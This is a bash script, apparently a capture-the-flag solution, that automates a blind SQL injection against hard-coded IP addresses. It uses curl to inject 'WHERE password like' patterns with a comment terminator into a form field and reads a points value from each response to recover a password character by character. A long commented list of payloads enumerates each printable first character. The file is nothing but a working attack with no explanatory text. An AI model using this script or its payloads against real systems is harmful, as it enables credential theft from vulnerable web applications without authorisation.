#! /bin/bash

alph="hH012456789abcdefghijklmnopqrstuvwxyz_"
# alph=" !\"#$%&'()*+,-./0123456789:;<=>?@[\]^_"
for (( i=0; i<${#alph}; i++ )); do
  echo "${alph:$i:1}"
  echo `curl -s http://47.75.14.48:23333 --data "flag=3218123&hi= WHERE password like '_______________'#" | grep -o 'My Points</grey> | [0-9]*'`
done


# curl -s http://47.97.168.223/ --data "flag=111&hi= WHERE password like '_______________'#" | grep -o 'My Points</grey> | [0-9]*'


# flag=883&hi= WHERE password like '!______________'
# flag=883&hi= WHERE password like '\"______________'
# flag=883&hi= WHERE password like '#______________'
# flag=883&hi= WHERE password like '$______________'
# flag=883&hi= WHERE password like '%______________'
# flag=883&hi= WHERE password like '&______________'
# flag=883&hi= WHERE password like ''______________'
# flag=883&hi= WHERE password like '(______________'
# flag=883&hi= WHERE password like ')______________'
# flag=883&hi= WHERE password like '*______________'
# flag=883&hi= WHERE password like '+______________'
# flag=883&hi= WHERE password like ',______________'
# flag=883&hi= WHERE password like '-______________'
# flag=883&hi= WHERE password like '.______________'
# flag=883&hi= WHERE password like '/______________'
# flag=883&hi= WHERE password like '0______________'
# flag=883&hi= WHERE password like '1______________'
# flag=883&hi= WHERE password like '2______________'
# flag=883&hi= WHERE password like '3______________'
# flag=883&hi= WHERE password like '4______________'
# flag=883&hi= WHERE password like '5______________'
# flag=883&hi= WHERE password like '6______________'
# flag=883&hi= WHERE password like '7______________'
# flag=883&hi= WHERE password like '8______________'
# flag=883&hi= WHERE password like '9______________'
# flag=883&hi= WHERE password like ':______________'
# flag=883&hi= WHERE password like '______________'
# flag=883&hi= WHERE password like '<______________'
# flag=883&hi= WHERE password like '=______________'
# flag=883&hi= WHERE password like '>______________'
# flag=883&hi= WHERE password like '?______________'
# flag=883&hi= WHERE password like '@______________'
# flag=883&hi= WHERE password like 'A______________'
# flag=883&hi= WHERE password like 'B______________'
# flag=883&hi= WHERE password like 'C______________'
# flag=883&hi= WHERE password like 'D______________'
# flag=883&hi= WHERE password like 'E______________'
# flag=883&hi= WHERE password like 'F______________'
# flag=883&hi= WHERE password like 'G______________'
# flag=883&hi= WHERE password like 'H______________'
# flag=883&hi= WHERE password like 'I______________'
# flag=883&hi= WHERE password like 'J______________'
# flag=883&hi= WHERE password like 'K______________'
# flag=883&hi= WHERE password like 'L______________'
# flag=883&hi= WHERE password like 'M______________'
# flag=883&hi= WHERE password like 'N______________'
# flag=883&hi= WHERE password like 'O______________'
# flag=883&hi= WHERE password like 'P______________'
# flag=883&hi= WHERE password like 'Q______________'
# flag=883&hi= WHERE password like 'R______________'
# flag=883&hi= WHERE password like 'S______________'
# flag=883&hi= WHERE password like 'T______________'
# flag=883&hi= WHERE password like 'U______________'
# flag=883&hi= WHERE password like 'V______________'
# flag=883&hi= WHERE password like 'W______________'
# flag=883&hi= WHERE password like 'X______________'
# flag=883&hi= WHERE password like 'Y______________'
# flag=883&hi= WHERE password like 'Z______________'
# flag=883&hi= WHERE password like '[______________'
# flag=883&hi= WHERE password like ']______________'
# flag=883&hi= WHERE password like '^______________'
# flag=883&hi= WHERE password like '_______________'
# flag=883&hi= WHERE password like '`______________'
# flag=883&hi= WHERE password like 'a______________'
# flag=883&hi= WHERE password like 'b______________'
# flag=883&hi= WHERE password like 'c______________'
# flag=883&hi= WHERE password like 'd______________'
# flag=883&hi= WHERE password like 'e______________'
# flag=883&hi= WHERE password like 'f______________'
# flag=883&hi= WHERE password like 'g______________'
# flag=883&hi= WHERE password like 'h______________'
# flag=883&hi= WHERE password like 'i______________'
# flag=883&hi= WHERE password like 'j______________'
# flag=883&hi= WHERE password like 'k______________'
# flag=883&hi= WHERE password like 'l______________'
# flag=883&hi= WHERE password like 'm______________'
# flag=883&hi= WHERE password like 'n______________'
# flag=883&hi= WHERE password like 'o______________'
# flag=883&hi= WHERE password like 'p______________'
# flag=883&hi= WHERE password like 'q______________'
# flag=883&hi= WHERE password like 'r______________'
# flag=883&hi= WHERE password like 's______________'
# flag=883&hi= WHERE password like 't______________'
# flag=883&hi= WHERE password like 'u______________'
# flag=883&hi= WHERE password like 'v______________'
# flag=883&hi= WHERE password like 'w______________'
# flag=883&hi= WHERE password like 'x______________'
# flag=883&hi= WHERE password like 'y______________'
# flag=883&hi= WHERE password like 'z______________'
# flag=883&hi= WHERE password like '{______________'
# flag=883&hi= WHERE password like '|______________'
# flag=883&hi= WHERE password like '}______________'
# flag=883&hi= WHERE password like '~______________'